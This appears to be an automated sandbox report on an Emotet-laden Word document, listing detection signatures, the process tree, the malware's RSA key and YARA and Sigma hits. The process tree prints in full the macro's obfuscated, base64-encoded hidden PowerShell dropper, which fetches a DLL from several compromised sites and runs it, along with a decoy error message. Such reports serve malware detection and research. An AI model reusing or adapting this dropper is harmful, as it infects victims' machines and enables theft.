Loading ...

Play interactive tourEdit tour

Analysis Report PO# 01222021.doc

Overview

General Information

Sample Name:PO# 01222021.doc
Analysis ID:344615
MD5:556b98b4cdae000de8f496d6d896743c
SHA1:b7ca4118eab252bc4758fa18265b04a2afbbf9c2
SHA256:dcfb145c4f46a072e988cdeafc065f8116dc3b27d6bed447024677f3ea2f252a

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
Creates processes via WMI
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Document contains an embedded VBA with many randomly named variables
Document contains an embedded VBA with many string operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Obfuscated command line found
Potential dropper URLs found in powershell memory
Powershell drops PE file
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1288 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • cmd.exe (PID: 2496 cmdline: cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
    • msg.exe (PID: 2524 cmdline: msg user /v Word experienced an error trying to open the file. MD5: 2214979661E779C3E3C33D4F14E6F3AC)
    • powershell.exe (PID: 1296 cmdline: powershell -w hidden -enc IAAgAFMAdgAgACAAUABCADUAbwAgACAAKABbAFQAWQBwAEUAXQAoACIAewAyAH0AewAxAH0AewA1AH0AewAzAH0AewAwAH0AewA2AH0AewA0AH0AIgAgAC0ARgAgACcAVAAnACwAJwBFAE0ALgBJACcALAAnAFMAWQBzAFQAJwAsACcAZQBDACcALAAnAHkAJwAsACcAbwAuAEQASQBSACcALAAnAE8AUgAnACkAIAApACAAOwAgACAAUwBFAHQALQBJAFQARQBtACAAdgBBAFIASQBhAEIATABlADoAbQA3AGEAOQAgACgAWwB0AHkAcABFAF0AKAAiAHsANAB9AHsAMgB9AHsAMwB9AHsANQB9AHsAMQB9AHsANgB9AHsAMAB9AHsANwB9ACIAIAAtAGYAJwBuACcALAAnAEkAQwBFAHAATwBJAE4AdABtACcALAAnAG4AZQBUACcALAAnAC4AJwAsACcAcwB5AFMAdABlAE0ALgAnACwAJwBzAEUAUgB2ACcALAAnAEEAJwAsACcAYQBHAGUAcgAnACkAIAApACAAIAA7ACAAIAAkAEkAaAB2ADgAOQBfAGcAPQAkAE0AOQAxAEcAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAEgAMgAzAEQAOwAkAEQAOQA0AE0APQAoACgAJwBQADcAJwArACcAMgAnACkAKwAnAFgAJwApADsAIAAoAGcARQBUAC0AdgBhAHIAaQBhAEIAbABlACAAcABiADUAbwAgAC0AVgBBACkAOgA6ACIAYwByAEUAYQBUAGUAZABpAGAAUgBlAEMAdABgAG8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACgAJwA5AGsAJwArACcAdABOAGsAJwApACsAJwAyACcAKwAnAGQAJwArACgAJwB1AGgAYgA5ACcAKwAnAGsAdAAnACsAJwBHAHgAbABoACcAKQArACgAJwA5AGkAJwArACcAYQA5AGsAdAAnACkAKQAuACIAcgBFAGAAUABsAGEAQwBlACIAKAAoACcAOQAnACsAJwBrAHQAJwApACwAJwBcACcAKQApACkAOwAkAEoAOAA3AEgAPQAoACcAUwAnACsAKAAnADMANgAnACsAJwBOACcAKQApADsAIAAoACAAIAB2AGEAUgBJAGEAYgBsAGUAIAAgAE0ANwBhADkAIAAgAC0AVgBBACAAIAApADoAOgAiAFMARQBjAHUAcgBpAFQAWQBwAGAAUgBvAFQAbwBDAGAAbwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAMgBVAD0AKAAnAEUAJwArACgAJwBfACcAKwAnAF8ARQAnACkAKQA7ACQAUAAyADcAcABxAGUAMwAgAD0AIAAoACcARQA2ACcAKwAnAF8AUgAnACkAOwAkAEYAMwA5AEwAPQAoACgAJwBRACcAKwAnADkANAAnACkAKwAnAFcAJwApADsAJABBAGQAMQByAGEAOABuAD0AJABIAE8ATQBFACsAKAAoACgAJwBLAGkAJwArACcAbQAnACkAKwAoACcATgBrADIAZAAnACsAJwB1AGgAYgAnACkAKwAnAEsAaQAnACsAJwBtACcAKwAoACcARwB4ACcAKwAnAGwAJwApACsAJwBoADkAJwArACgAJwBpACcAKwAnAGEASwBpACcAKQArACcAbQAnACkALQBSAGUAUABsAGEAYwBlACgAWwBDAEgAQQBSAF0ANwA1ACsAWwBDAEgAQQBSAF0AMQAwADUAKwBbAEMASABBAFIAXQAxADAAOQApACwAWwBDAEgAQQBSAF0AOQAyACkAKwAkAFAAMgA3AHAAcQBlADMAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFYAMgA4AFUAPQAoACcAQwA4ACcAKwAnADgASwAnACkAOwAkAE0AcgBpAHEAZAA1ADkAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABLAHcAMwA3ADkANAB4AD0AKAAnAHgAIAAnACsAJwBbACcAKwAoACcAIABzAGgAJwArACcAIAAnACkAKwAoACcAYgAnACsAJwA6AC8ALwBjAGEAYgAuAG0AeQAnACsAJwBrAGYAJwApACsAJwBuAC4AJwArACgAJwBjAG8AbQAnACsAJwAvACcAKQArACcAYQAnACsAKAAnAGQAJwArACcAbQBpAG4AJwApACsAJwAvACcAKwAoACcAWAAvACcAKwAnACEAJwApACsAJwB4ACcAKwAoACcAIAAnACsAJwBbACAAcwAnACkAKwAnAGgAJwArACgAJwAgAGIAJwArACcAOgAnACkAKwAoACcALwAnACsAJwAvAGIAaABhACcAKQArACcAawAnACsAJwB0AGkAJwArACgAJwB2AHIAaQBuAGQAJwArACcALgAnACsAJwBjAG8AbQAvAGMAJwApACsAJwBnACcAKwAoACcAaQAnACsAJwAtAGIAaQBuACcAKQArACgAJwAvACcAKwAnAEoAQgBiAGIAJwArACcAOAAnACsAJwAvACEAeAAgAFsAIAAnACkAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKQArACgAJwAvACcAKwAnAC8AdgBhAG4AJwArACcAZABkAG4AYQAnACkAKwAoACcAYgBoAGEAcgBnACcAKwAnAGEAJwApACsAJwB2AGUAJwArACgAJwAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAGEAcwBzACcAKwAnAGUAdAAnACkAKwAnAC8AVwAnACsAKAAnADkAbwAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACAAJwArACcAWwAgACcAKwAoACcAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACgAJwAvAGkAZQAtACcAKwAnAGIAJwArACcAZQAnACkAKwAoACcAcwAnACsAJwB0AC4AbgAnACkAKwAnAGUAJwArACgAJwB0AC8AbwAnACsAJwBuACcAKwAnAGwAaQBuACcAKQArACcAZQAnACsAKAAnAC0AJwArACcAdABpAG0AZQByACcAKwAnAC0AJwApACsAKAAnAGsAJwArACcAdgBoACcAKQArACgAJwB4AHoAJwArACcALwBpACcAKQArACcAbAAnACsAKAAnAFgAJwArACcATAAvACEAeAAnACkAKwAoACcAIABbACAAcwAnACsAJwBoACAAJwApACsAKAAnAGIAOgAnACsAJwAvACcAKQArACcALwAnACsAJwBnACcAKwAoACcAbwBjACcAKwAnAHAAJwArACcAaABvAG4AJwApACsAKAAnAGcAdABoACcAKwAnAGUAJwApACsAKAAnAC4AYwBvAG0ALwAnACsAJwB3AHAAJwArACcALQAnACkAKwAnAGMAbwAnACsAJwBuAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAGwAJwApACsAJwBNACcAKwAoACcATQBDACcAKwAnAC8AIQAnACkAKwAoACcAeAAgACcAKwAnAFsAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8ALwAnACsAJwB3AHcAJwApACsAJwB3ACcAKwAoACcALgBsACcAKwAnAGUAJwApACsAKAAnAHQAJwArACcAcwBjACcAKQArACcAbwBtACcAKwAnAHAAYQAnACsAKAAnAHIAJwArACcAZQBvAG4AJwApACsAKAAnAGwAJwArACcAaQBuACcAKQArACgAJwBlACcAKwAnAC4AYwAnACkAKwAoACcAbwBtAC8AZAAnACsAJwBlACcAKQArACgAJwAuAGwAJwArACcAZQB0ACcAKQArACcAcwBjACcAKwAnAG8AbQAnACsAJwBwACcAKwAnAGEAJwArACcAcgBlACcAKwAnAG8AbgAnACsAKAAnAGwAaQAnACsAJwBuAGUAJwApACsAKAAnAC4AJwArACcAYwBvAG0AJwArACcALwB3AFkAZAAvACcAKwAnACEAeAAgACcAKQArACcAWwAnACsAKAAnACAAcwAnACsAJwBoACAAYgAnACsAJwA6AC8AJwApACsAJwAvACcAKwAnAGMAYQAnACsAJwBtAGIAJwArACcAaQAnACsAKAAnAGEAcwB1AGgAJwArACcAaQAnACkAKwAoACcAcwB0AG8AcgAnACsAJwBpAGEAJwArACcALgBnAHIAbwB3ACcAKQArACcAbAAnACsAJwBhAGIAJwArACgAJwAuACcAKwAnAGUAcwAvAHcAcAAnACsAJwAtACcAKQArACcAYwBvACcAKwAnAG4AdAAnACsAJwBlAG4AJwArACcAdAAnACsAKAAnAC8AaAAnACsAJwBHAGgAWQAnACkAKwAnADIALwAnACkALgAiAHIAYABlAHAAYABMAEEAQwBlACIAKAAoACcAeAAgACcAKwAnAFsAJwArACgAJwAgAHMAaAAnACsAJwAgAGIAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAG4AagAnACwAJwB0AHIAJwApACwAJwB5AGoAJwAsACcAcwBjACcALAAkAE0AcgBpAHEAZAA1ADkALAAnAHcAZAAnACkAWwAzAF0AKQAuACIAcwBQAGwAYABpAHQAIgAoACQAQQA3ADYAQgAgACsAIAAkAEkAaAB2ADgAOQBfAGcAIAArACAAJABRADcAXwBSACkAOwAkAFYAOABfAEcAPQAoACgAJwBNACcAKwAnADUAMQAnACkAKwAnAFYAJwApADsAZgBvAHIAZQBhAGMAaAAgACgAJABYAGoAOABzADEANQAxACAAaQBuACAAJABLAHcAMwA3ADkANAB4ACkAewB0AHIAeQB7ACgALgAoACcATgBlACcAKwAnAHcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABzAFkAUwB0AEUAbQAuAG4ARQBUAC4AdwBFAEIAQwBMAEkAZQBuAFQAKQAuACIAZABPAGAAdwBuAGAATABPAGEARABmAGkAbABlACIAKAAkAFgAagA4AHMAMQA1ADEALAAgACQAQQBkADEAcgBhADgAbgApADsAJABEADkANABKAD0AKAAnAEIAJwArACgAJwAzACcAKwAnADIARwAnACkAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAtAEkAJwArACcAdABlACcAKwAnAG0AJwApACAAJABBAGQAMQByAGEAOABuACkALgAiAEwAYABFAG4AZwBgAFQASAAiACAALQBnAGUAIAAzADMAMQAyADAAKQAgAHsALgAoACcAcgB1AG4AZABsACcAKwAnAGwAMwAnACsAJwAyACcAKQAgACQAQQBkADEAcgBhADgAbgAsACgAJwBBACcAKwAnAG4AeQAnACsAKAAnAFMAdAByACcAKwAnAGkAJwApACsAJwBuAGcAJwApAC4AIgB0AE8AUwBUAFIAYABpAG4ARwAiACgAKQA7ACQAVgA3ADgAQgA9ACgAJwBTACcAKwAoACcAOAA1ACcAKwAnAEIAJwApACkAOwBiAHIAZQBhAGsAOwAkAFYAOABfAFAAPQAoACcARgA2ACcAKwAnADcATAAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAMAA0AFYAPQAoACcASQAyACcAKwAnADYAWgAnACkA MD5: 852D67A27E454BD389FA7F02A8CBE23F)
      • rundll32.exe (PID: 2832 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString MD5: DD81D91FF3B0763C392422865C9AC12E)
        • rundll32.exe (PID: 2780 cmdline: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 2896 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
            • rundll32.exe (PID: 2936 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',NRUAmATPeNJ MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2480 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Agilzgamuljjdwml\mwfcqgtqrgsdamx.pjv',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 1948 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',VDZITWzoE MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2844 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Obbeicpozdckojlb\bhzpo.yca',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 3028 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',KCoulWayDpJU MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 3000 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Bpqpm\gwvn.lsl',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                        • rundll32.exe (PID: 2260 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',iFoslrVsudBDI MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                          • rundll32.exe (PID: 1756 cmdline: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Upjyf\ffrm.rmq',#1 MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhANQOcBKvh5xEW7VcJ9totsjdBwuAclxS\nQ0e09fk8V053lktpW3TRrzAW63yt6j1KWnyxMrU3igFXypBoI4lVNmkje4UPtIIS\nfkzjEIvG1v/ZNn1k0J0PfFTxbFFeUEs3AwIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000009.00000002.2125204739.0000000000210000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000010.00000002.2340896532.0000000010000000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      0000000D.00000002.2169811211.00000000001D0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        0000000E.00000002.2182561871.00000000001E0000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          0000000A.00000002.2135567121.0000000000210000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
            Click to see the 25 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            12.2.rundll32.exe.10000000.3.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
              13.2.rundll32.exe.10000000.2.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                16.2.rundll32.exe.10000000.2.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                  8.2.rundll32.exe.190000.0.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                    13.2.rundll32.exe.1d0000.1.raw.unpackJoeSecurity_EmotetYara detected EmotetJoe Security
                      Click to see the 55 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Suspicious Call by OrdinalShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1, CommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: 'C:\Windows\system32\rundll32.exe' C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll AnyString, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 2780, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe 'C:\Users\user\Nk2duhb\Gxlh9ia\E6_R.dll',#1, ProcessId: 2896
                      Sigma detected: Suspicious Encoded PowerShell Command LineShow sources
                      Source: Process startedAuthor: Florian Roth, Markus Neis: Data: Command: powershell -w hidden -enc 